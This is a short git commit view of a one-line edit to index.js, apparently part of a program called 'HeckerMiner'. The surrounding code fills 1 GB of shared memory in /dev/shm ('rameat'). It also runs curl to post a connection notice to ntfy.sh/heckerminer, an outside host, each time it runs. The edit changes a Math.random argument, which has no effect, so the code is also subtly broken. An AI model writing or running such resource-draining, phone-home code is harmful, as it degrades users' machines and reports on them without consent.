Update index.js

This commit is contained in:
heckeralt 2024-09-04 13:10:47 -04:00
parent fbe4161b5f
commit fefe426f01
1 changed files with 1 additions and 1 deletions

View File

@ -12,7 +12,7 @@ if (os.platform() === 'win32') {
child.execSync('fallocate -l 1G /dev/shm/rameat');
console.log(os.cpus());
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
const numLines = Math.random(3100);
const numLines = Math.random(50000);
// Generate random numbers and concatenate with newline characters
let content = Math.random();
for (let i = 0; i < numLines; i++) {